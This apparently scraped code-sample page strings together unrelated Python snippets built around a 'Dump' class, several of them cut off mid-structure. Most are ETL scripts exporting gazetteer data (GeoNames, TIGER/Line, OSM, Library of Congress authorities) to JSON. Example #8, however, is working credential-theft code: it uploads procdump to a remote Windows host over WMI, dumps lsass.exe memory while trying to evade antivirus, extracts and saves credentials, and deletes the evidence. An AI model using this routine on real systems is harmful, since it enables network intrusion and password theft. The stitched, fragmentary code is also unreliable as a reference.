Пример #1
0
def generate_history(gz_file, dump_path, place_index):
    f = gzip.open(gz_file, 'rb')
    uid = uuid.uuid4()
    unique_name = uid.hex
    dump = Dump(dump_path + "/historydump/history"+unique_name+".%04d.json.gz")
    histindex = place_index+"-history"  #i.e. gazetest2-history
    
    for line in f:
        index_json = line
        doc_id = json.loads(index_json)["index"]["_id"]
        
        doc_json = f.next()  #nextline
        doc = json.loads(doc_json)

        digest = hashlib.sha1(json.dumps(doc, sort_keys=True)).hexdigest()

        #SAVE HISTORY (the records tied to a place which have revisions)
        history_doc = {"index" : place_index, "type": "place", "id" : doc_id, "revisions": [{"user_created":"ETL", "created_at":time.time(),"digest":digest}]}
        
        dump.write_bulk(histindex, "place", doc_id, history_doc)

    f.close()
    dump.close()
Пример #2
0
def generate_history(gz_file, dump_path, place_index):
    f = gzip.open(gz_file, 'rb')
    uid = uuid.uuid4()
    unique_name = uid.hex
    dump = Dump(dump_path + "/historydump/history" + unique_name +
                ".%04d.json.gz")
    histindex = place_index + "-history"  #i.e. gazetest2-history

    for line in f:
        index_json = line
        doc_id = json.loads(index_json)["index"]["_id"]

        doc_json = f.next()  #nextline
        doc = json.loads(doc_json)

        digest = hashlib.sha1(json.dumps(doc, sort_keys=True)).hexdigest()

        #SAVE HISTORY (the records tied to a place which have revisions)
        history_doc = {
            "index":
            place_index,
            "type":
            "place",
            "id":
            doc_id,
            "revisions": [{
                "user_created": "ETL",
                "created_at": time.time(),
                "digest": digest
            }]
        }

        dump.write_bulk(histindex, "place", doc_id, history_doc)

    f.close()
    dump.close()
            "relationships": [],
            "timeframe":timeframe,
            "admin":[],
            "address": address

        }

        dump.write(uri, place)
        

if __name__ == "__main__":
    shapefile, dump_path = sys.argv[1:3]
    
    #simplify_tolerance = .01 # ~ 11km (.001 = 111m)
    simplify_tolerance = None
    uri_name = "http://maps.nypl.org/warper/layers/861"
    
    dump_basename = os.path.basename(shapefile)
    dump = Dump(dump_path + "/shapefile/"+ dump_basename + ".%04d.json.gz")
    
    extract_shapefile(shapefile, uri_name, simplify_tolerance)
    
    dump.close()
    


#python shapefile.py "/path/to/shapefile/buildings.shp" /path/to/gz_dump

#python nyc_perris_digitizer_csv.py ../../../GazetteerData/Manhattan\ Buildings\ Perris\ 10_23_2012/FinalCleanedData_Perris1854_tab.csv nydump

            "source": source,
            "alternate": alternates,
            "updated": updated,
            "uris": [uri],
            "relationships": [],
            "timeframe": timeframe,
            "admin": [],
            "address": address
        }

        dump.write(uri, place)


if __name__ == "__main__":
    shapefile, dump_path = sys.argv[1:3]

    #simplify_tolerance = .01 # ~ 11km (.001 = 111m)
    simplify_tolerance = None
    uri_name = "http://maps.nypl.org/warper/layers/861"

    dump_basename = os.path.basename(shapefile)
    dump = Dump(dump_path + "/shapefile/" + dump_basename + ".%04d.json.gz")

    extract_shapefile(shapefile, uri_name, simplify_tolerance)

    dump.close()

#python shapefile.py "/path/to/shapefile/buildings.shp" /path/to/gz_dump

#python nyc_perris_digitizer_csv.py ../../../GazetteerData/Manhattan\ Buildings\ Perris\ 10_23_2012/FinalCleanedData_Perris1854_tab.csv nydump
Пример #5
0
def extract_geonames(data_path, dump_path):
    alt_names = tab_file(data_path + "/alternateNames.sorted.txt", columns["alternate"])
    geonames = tab_file(data_path + "/allCountries.sorted.txt", columns["geoname"])
    dump = Dump(dump_path + "/geonames/geonames.%04d.json.gz")
    extra_alt_name = {}
    for geoname in geonames:
        alt_name_list = []
        if extra_alt_name.get("geoname_id") == geoname["geoname_id"]:
            alt_name_list.append(extra_alt_name)
            extra_alt_name = {}
        for alt_name in alt_names:
            if alt_name["geoname_id"] == geoname["geoname_id"]:
                alt_name_list.append(alt_name)
            else:
                extra_alt_name = alt_name
                break
        geoname["alternate_names"] = alt_name_list
        try:
            for col in ("latitude", "longitude"):
                geoname[col] = float(geoname[col])
        except ValueError:
            ### busted coordinates
            continue
        centroid = [geoname["longitude"], geoname["latitude"]]
        population = None
        try:
            population = int(geoname["population"])
        except ValueError:
            pass
        uri = "http://geonames.org/" + geoname["geoname_id"]
        names = []
        alt_name_list.append({
            "name": geoname["name"],
            "lang": "",
            "type": "preferred"
        })
        for alt_name in alt_name_list:
            name_type = ""
            if alt_name.get("is_colloquial"): name_type = "colloquial"
            if alt_name.get("is_historic"): name_type = "historic"
            if alt_name.get("is_preferred"): name_type = "preferred"
            if alt_name.get("is_short"): name_type = "short"
            alt_name = {
                "lang": alt_name["lang"], 
                "type": name_type, 
                "name": alt_name["name"]
            }
            names.append(alt_name)
            ascii_name = transliterate(alt_name)
            if ascii_name: names.append(ascii_name)
        place = {
            "name": geoname["name"],
            "centroid": centroid,
            "feature_code": geoname["feature_code"],
            "geometry": {"type": "Point", "coordinates": centroid},
            "is_primary": True,
            "source": geoname,
            "alternate": names,
            "updated": geoname["changed_at"],
            "population": population,
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        dump.write(uri, place)

    dump.close()
Пример #6
0
            "updated": updated,
            "uris":[uri],
            "relationships": [],
            "timeframe":timeframe,
            "admin":[]
        }
        
        dump.write(uri, place)
        

 
if __name__ == "__main__":
    csvfile, dump_path = sys.argv[1:3]
   
    #simplify_tolerance = .01 # ~ 11km (.001 = 111m)
    simplify_tolerance = None
    uri_name = "http://nrhp.focus.nps.gov?referenceNumber:"
    #http://nrhp.focus.nps.gov/natregadvancedsearch.do?referenceNumber:73001435
    
    dump_basename = os.path.basename(csvfile)
    dump = Dump(dump_path + "/json/"+ dump_basename + ".%04d.json.gz")
    extract_geojson(csvfile, uri_name, simplify_tolerance)
    
    dump.close()



#python nrhp.py nhrp.csv nrhpdump

#python nrhp.py "/path/to/directory"   /path/to/gz_dump2
Пример #7
0
if __name__ == "__main__":
    shapefile, dump_path = sys.argv[1:3]
    
    #http://www2.census.gov/geo/tiger/TIGER2012/STATE/tl_2012_us_state.zip
    #http://www2.census.gov/geo/tiger/TIGER2012/COUNTY/tl_2012_us_county.zip
    
    uri_name = "http://www2.census.gov/geo/tiger/TIGER2012/COUNTY/tl_2012_us_county.zip"
    if "tl_2012_us_state" in shapefile:
        uri_name = "http://www2.census.gov/geo/tiger/TIGER2012/STATE/tl_2012_us_state.zip"
        
    
    #simplify_tolerance = .01 # ~ 11km (.001 = 111m)
    simplify_tolerance = .0001
    
    dump_basename = os.path.basename(shapefile)
    dump = Dump(dump_path + "/shapefile/"+ dump_basename + ".%04d.json.gz")
    dump.max_rows = "1000"
    
    extract_shapefile(shapefile, uri_name, simplify_tolerance)
    
    dump.close()
    


#python tiger_line.py ../../../tiger_line/tl_2012_us_state/tl_2012_us_state.shp tigerdump
#python tiger_line.py ../../../tiger_line/tl_2012_us_county/tl_2012_us_county.shp tigerdump


#Layer name: tl_2012_us_state
#Geometry: 3D Polygon
#Feature Count: 56
Пример #8
0
    def run(self, addr, osArch='64'):
        dcom = DCOMConnection(addr,
                              self.__username,
                              self.__password,
                              self.__domain,
                              self.__lmhash,
                              self.__nthash,
                              self.__aesKey,
                              oxidResolver=True,
                              doKerberos=self.__doKerberos,
                              kdcHost=self.__kdcHost)
        try:
            iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,
                                                 wmi.IID_IWbemLevel1Login)
            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
            iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL,
                                                       NULL)
            iWbemLevel1Login.RemRelease()

            win32Process, _ = iWbemServices.GetObject('Win32_Process')

            self.shell = RemoteShell(self.__share, win32Process,
                                     self.__smbConnection)

            # Upload procdump
            procpath = os.path.join(
                os.path.dirname(os.path.realpath(sys.argv[0])), 'misc',
                'procdump', 'procdump%s.exe' % (osArch))
            logging.info("%s  Uploading procdump to %s..." % (debugBlue, addr))
            if logging.getLogger().getEffectiveLevel() > 10:
                with suppress_std():
                    self.shell.do_put(procpath)
            else:
                self.shell.do_put(procpath)

            dt = datetime.now().strftime("%m-%d-%Y_%H-%M-%S")

            # Execute procdump silently with pid to avoid AVs as much as possible
            cmd = """for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do procdump{}.exe -accepteula -ma ^%B C:\\{}.dmp""".format(
                osArch, addr + "_" + dt)
            logging.info("%s  Executing procdump on %s..." % (debugBlue, addr))
            if logging.getLogger().getEffectiveLevel() > 10:
                with suppress_std():
                    self.shell.onecmd(cmd)
            else:
                self.shell.onecmd(cmd)

            # Create dump's file descriptor to parse dumps remotely
            logging.info("%s  Creating dump's file descriptor on %s..." %
                         (debugBlue, addr))
            logging.info("%s  Parsing %s's dump remotely..." %
                         (debugBlue, addr))
            dump = Dump(self.__smbConnection,
                        """{}.dmp""".format(addr + "_" + dt))
            credentials = parseDump(dump)
            if credentials is not None:
                print_credentials(addr, credentials)
                write_credentials(addr, credentials)

        finally:
            # Clean remote machines (dump & procdump)
            logging.info("%s  Closing dump file on %s..." % (debugBlue, addr))
            dump.close()
            logging.info("%s  Deleting procdump on %s..." % (debugBlue, addr))
            if logging.getLogger().getEffectiveLevel() > 10:
                with suppress_std():
                    self.shell.onecmd("del procdump%s.exe" % (osArch))
            else:
                self.shell.onecmd("del procdump%s.exe" % (osArch))

            logging.info("%s  Deleting dump on %s..." % (debugBlue, addr))
            if logging.getLogger().getEffectiveLevel() > 10:
                with suppress_std():
                    self.shell.onecmd("del %s.dmp" % (addr + "_" + dt))
            else:
                self.shell.onecmd("del %s.dmp" % (addr + "_" + dt))

            if self.__smbConnection is not None:
                self.__smbConnection.logoff()
            dcom.disconnect()
            sys.stdout.flush()
Пример #9
0
if __name__ == "__main__":
    shapefile, dump_path = sys.argv[1:3]

    #http://www2.census.gov/geo/tiger/TIGER2012/STATE/tl_2012_us_state.zip
    #http://www2.census.gov/geo/tiger/TIGER2012/COUNTY/tl_2012_us_county.zip

    uri_name = "http://www2.census.gov/geo/tiger/TIGER2012/COUNTY/tl_2012_us_county.zip"
    if "tl_2012_us_state" in shapefile:
        uri_name = "http://www2.census.gov/geo/tiger/TIGER2012/STATE/tl_2012_us_state.zip"

    #simplify_tolerance = .01 # ~ 11km (.001 = 111m)
    simplify_tolerance = .0001

    dump_basename = os.path.basename(shapefile)
    dump = Dump(dump_path + "/shapefile/" + dump_basename + ".%04d.json.gz")
    dump.max_rows = "1000"

    extract_shapefile(shapefile, uri_name, simplify_tolerance)

    dump.close()

#python tiger_line.py ../../../tiger_line/tl_2012_us_state/tl_2012_us_state.shp tigerdump
#python tiger_line.py ../../../tiger_line/tl_2012_us_county/tl_2012_us_county.shp tigerdump

#Layer name: tl_2012_us_state
#Geometry: 3D Polygon
#Feature Count: 56
#Extent: (-179.231086, -14.601813) - (179.859681, 71.441059)
#Layer SRS WKT:
#GEOGCS["GCS_North_American_1983",
Пример #10
0
def extract_geonames(data_path, dump_path):
    alt_names = tab_file(data_path + "/alternateNames.sorted.txt",
                         columns["alternate"])
    geonames = tab_file(data_path + "/allCountries.sorted.txt",
                        columns["geoname"])
    dump = Dump(dump_path + "/geonames/geonames.%04d.json.gz")
    extra_alt_name = {}
    for geoname in geonames:
        alt_name_list = []
        if extra_alt_name.get("geoname_id") == geoname["geoname_id"]:
            alt_name_list.append(extra_alt_name)
            extra_alt_name = {}
        for alt_name in alt_names:
            if alt_name["geoname_id"] == geoname["geoname_id"]:
                alt_name_list.append(alt_name)
            else:
                extra_alt_name = alt_name
                break
        geoname["alternate_names"] = alt_name_list
        try:
            for col in ("latitude", "longitude"):
                geoname[col] = float(geoname[col])
        except ValueError:
            ### busted coordinates
            continue
        centroid = [geoname["longitude"], geoname["latitude"]]
        population = None
        try:
            population = int(geoname["population"])
        except ValueError:
            pass
        uri = "http://geonames.org/" + geoname["geoname_id"]
        names = []
        alt_name_list.append({
            "name": geoname["name"],
            "lang": "",
            "type": "preferred"
        })
        for alt_name in alt_name_list:
            name_type = ""
            if alt_name.get("is_colloquial"): name_type = "colloquial"
            if alt_name.get("is_historic"): name_type = "historic"
            if alt_name.get("is_preferred"): name_type = "preferred"
            if alt_name.get("is_short"): name_type = "short"
            alt_name = {
                "lang": alt_name["lang"],
                "type": name_type,
                "name": alt_name["name"]
            }
            names.append(alt_name)
            ascii_name = transliterate(alt_name)
            if ascii_name: names.append(ascii_name)
        place = {
            "name": geoname["name"],
            "centroid": centroid,
            "feature_code": geoname["feature_code"],
            "geometry": {
                "type": "Point",
                "coordinates": centroid
            },
            "is_primary": True,
            "source": geoname,
            "alternate": names,
            "updated": geoname["changed_at"],
            "population": population,
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        dump.write(uri, place)

    dump.close()
Пример #11
0
def extract_lc_auth(data_path, dump_path):
    dump = Dump(dump_path + "/lc_auth/lc_auth.%04d.json.gz")
    for line in file(data_path):
        auth = json.loads(line)
        if "isMemberOfMADSScheme" in auth:
            del auth["isMemberOfMADSScheme"]
        if "adminMetadata" in auth:
            del auth["adminMetadata"]
        alt_names = []
        # print "hasVariant: ", auth.get("hasVariant")
        for label in get_labels(auth.get("hasVariant")):
            alt_names.append({"name": label})
        for label in get_labels(auth.get("hasEarlierEstablishedForm")):
            alt_names.append({"name": label, "type": "historical"})
        geom = fcode = None
        has_source = auth.get("hasSource")
        if has_source:
            note = has_source.get("citation-note")
            if note:
                lat = coords_to_dms(ns_coords, note)
                lon = coords_to_dms(ew_coords, note)
                if lat and lon:
                    geom = {"type": "Point", "coordinates": [lon, lat]}
                # search the citation-note
                fcode = extract_fcode(note)
            if not fcode:
                source = has_source.get("citation-source", "")
                fcode = extract_fcode(source)
        if not fcode:
            fcode = "AUTH"
        uri = auth["id"]
        if "authoritativeLabel" not in auth:
            continue

        updated = datetime.datetime.utcnow().replace(second=0, microsecond=0).isoformat()

        auth_source = {}
        auth_source = {"type": [], "id": "", "authoritativeLabel": "", "note": "", "editorialNote": ""}
        for key in auth_source.keys():
            if auth.has_key(key):
                auth_source[key] = auth[key]

        place = {
            "name": auth["authoritativeLabel"],
            "feature_code": fcode,
            "alternate": alt_names,
            "is_primary": True,
            "updated": updated,
            "source": auth_source,
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": [],
        }
        if geom:
            place["geometry"] = geom
            place["centroid"] = geom["coordinates"]
        else:
            place["geometry"] = {}
            place["centroid"] = []
        dump.write(uri, place)
    dump.close()
Пример #12
0
def extract_lc_auth(data_path, dump_path):
    dump = Dump(dump_path + "/lc_auth/lc_auth.%04d.json.gz")
    for line in file(data_path):
        auth = json.loads(line)
        if "isMemberOfMADSScheme" in auth: del auth["isMemberOfMADSScheme"]
        if "adminMetadata" in auth: del auth["adminMetadata"]
        alt_names = []
        #print "hasVariant: ", auth.get("hasVariant")
        for label in get_labels(auth.get("hasVariant")):
            alt_names.append({"name": label})
        for label in get_labels(auth.get("hasEarlierEstablishedForm")):
            alt_names.append({"name": label, "type": "historical"})
        geom = fcode = None
        has_source = auth.get("hasSource")
        if has_source:
            note = has_source.get("citation-note")
            if note:
                lat = coords_to_dms(ns_coords, note)
                lon = coords_to_dms(ew_coords, note)
                if lat and lon:
                    geom = {"type": "Point", "coordinates": [lon, lat]}
                # search the citation-note
                fcode = extract_fcode(note)
            if not fcode:
                source = has_source.get("citation-source", "")
                fcode = extract_fcode(source)
        if not fcode:
            fcode = "AUTH"
        uri = auth["id"]
        if "authoritativeLabel" not in auth:
            continue

        updated = datetime.datetime.utcnow().replace(
            second=0, microsecond=0).isoformat()

        auth_source = {}
        auth_source = {
            "type": [],
            "id": "",
            "authoritativeLabel": "",
            "note": "",
            "editorialNote": ""
        }
        for key in auth_source.keys():
            if auth.has_key(key):
                auth_source[key] = auth[key]

        place = {
            "name": auth["authoritativeLabel"],
            "feature_code": fcode,
            "alternate": alt_names,
            "is_primary": True,
            "updated": updated,
            "source": auth_source,
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        if geom:
            place["geometry"] = geom
            place["centroid"] = geom["coordinates"]
        else:
            place["geometry"] = {}
            place["centroid"] = []
        dump.write(uri, place)
    dump.close()
Пример #13
0
                names.append(ascii_name)
        source = dict(row)
        for key in source.keys():
            if not source[key] or key in ("geojson", "centroid_x",
                                          "centroid_y", "way"):
                del source[key]
        place = {
            "name": preferred_name,
            "centroid": centroid,
            "feature_code": feature_code,
            "geometry": geometry,
            "is_primary": True,
            "source": source,
            "alternate": names,
            "updated": row["timestamp"],
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        dump.write(uri, place)


if __name__ == "__main__":
    import sys
    database, dump_path = sys.argv[1:3]
    dump = Dump(dump_path + "/osm/osm.%04d.json.gz")
    extract_osm(database, "planet_osm_point", "node", dump)
    extract_osm(database, "planet_osm_polygon", "way", dump)
    dump.close()